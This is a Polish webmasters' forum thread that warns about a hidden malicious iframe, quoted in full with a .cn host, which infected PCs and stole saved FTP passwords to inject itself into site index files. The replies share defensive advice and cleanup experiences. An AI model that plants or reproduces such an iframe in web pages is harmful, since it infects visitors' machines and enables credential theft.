Uwaga na złośliwy kod

[milkus]

Wczoraj wszedłem na stronę z ramką o treści :

<iframe src="https://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

Zainfekowany system zawiesza się, a w tym samym czasie na strony, które mamy wpisane w kliencie FTP, zostaje dopisane iframe, do plików index. O samym problemie pisano już na tym forum.

Jeśli macie avasta to polecam zablokowanie adresu wskazanego w powyższym kodzie iframe (Słona WWW -> Blokowanie URL).

[zakręcony]

miałem ten syf na swoich stronach, 2 dni zmarnowałem na czyszczenie...

od tamtej pory zero haseł w programach ftp...

blokowanie tego adresu guzik, da bo za każdym razem zmienia się adres... w sensie, dziś wchodzi sobie bot na ftp dodaje kod i idzie dalej, jutro idzie bot i wstawia inny adres

jak to działa? wchodzisz na stronę, nood krzyczy że masz wirola, nastepuje blokada systemu, restart, podczas uruchomienia, wirusek robi dalej swoje, blokuje aktualizację wirusów, blokuje same antywirki, blokuje aktualizację autoimatyczne okienek, wykrada hasełka zapisane w TC do ftp i masz co robić

po infekcji najlepiej porobic logi i dac do sprawdzenia gdzieś gdzie się znają na tym... albo format

poobcinał bym rece osobom wymyślającym takie rzeczy... ale to już inna historia :]

edit:

jak się ma strony na kilku hostingach można ciekawych rzeczy się dowiedzieć, ja na przykład po zmianie hasła do ftp przez 5 dni miałem ataki dzień w dzień... zmieniałem hasła i zgłaszałem sprawę suportowi, co sie okazało, pierwsze hasło wpisane podczas zakładania konta było aktywne nawet po zmianie... oczywiście bug naprawiono

[mrbox]

Już w innym temacie podałem linka na vBeta, który wg mnie wyjaśnia dlaczego ostatnio jest takie nasilenie tych iframe'ów.

No ale ciężko jest się przestrzec przed takim czymś- albo trzeba by przeglądarkę w maszynie wirtualnej odpalać, albo zmieniać system(ale to nie każdy chce robić).

[mkr]

Wywalić stare, dziurawe instalacje Adobe Reader ( w zamian np. Foxit ), zaktualizować quicktime, zainwestować w dobre i znane rozwiązania antywirusowe.

[zakręcony]

ja zainwestowałem w nooda, ale i to nie pomogło, jak pisałem, zakrzyczał, ale system został zawieszony i dalej już poszło

[milkus]

Właśnie walczę z tym cholerstwem. Worpresy po usunięciu kodu padły, gdyż to wpieprza się między kod php, usuwając część kodu.

Chętnie bym dorwał tego typa.

[Irek]

Może już czas zainstalować Linuksa

[zakręcony]

nie wszystkie pliki są infekowane

index (tez tego typu: index-blabla.php)

home

main (tez tego typu: main-blabla.php)

default (tez tego typu: default-blabla.php)

tyle pamięta, ale na bank to nie wszystkie

[mrbox]

Może już czas zainstalować Linuksa

Irek, błagam, tylko nie zaczynajmy kolejnego flame'a

Tak więc- niech każdy sobie pracuje na czym tam chce, z jedną uwagą- użytkownicy M$ powinni mieć wszystkie programy aktualne, na czele z samym systemem(a dobrze wiem, że aktualizacje się często albo wyłącza, albo odsuwa w nieskończoność).

[zakręcony]

u mnie na XP nie ma tylko sp3 i ie8 :]

nod32

spybot S&D

pc tools firewall (na lapku tego nie mam)

windows defender

się człowiek zabezpiecza a guma i tak peka jak ma peknąć

[Irek]

Irek, błagam, tylko nie zaczynajmy kolejnego flame'a

Bez przesady, nie namawiam nikogo wymiany systemy, ale dodatkowy Linuks do łączenia się z serwerami (ftp) nie byłby złym pomysłem. Nawet gdyby Windowsa coś zaatakowało to hasła są bezpieczne.

[mrbox]

Po to dałem emotkę ' ', żeby nie brać tego do końca na poważnie A sam osobiście się z Tobą zgadzam- ja jestem zwolennikiem używania Linuksa w sprawach zawodowych

No to zakręcony- mówi się trudno i robi 'Format C:\'

[milkus]

Kurde przeleciałem pliki Wordpressa i nie widzę żadnego iframe, ale jak sprawdzam kod strony i gdzieś to jest. Dolepiło mi to g*wno na początku, przed HTML. Nie wiecie gdzie wp keszuje strony. Przeleciałem już wszystkie katalogi i nigdzie nie widzę tego kodu.

[kolryb29]

Jaki klient FTP?

Zawsze można mieć Windowsa + VMPlayer + Jakiś Linux (np. UBuntu)

[zakręcony]

No to zakręcony- mówi się trudno i robi 'Format C:\'

otóż nie poszedłem na inne forum, gdzie sprawdzili mi logi (HJ i CF), poradzili co zrobić i mam na dzien dzisiejszy spokój... ale jakoś nie chce wejść na stronę z tym iframe...

edit:

jako ciekawostka, mogę dodać że swojego XP pro na domowym pc mam juz bez formatu z 4, a może i więcej latek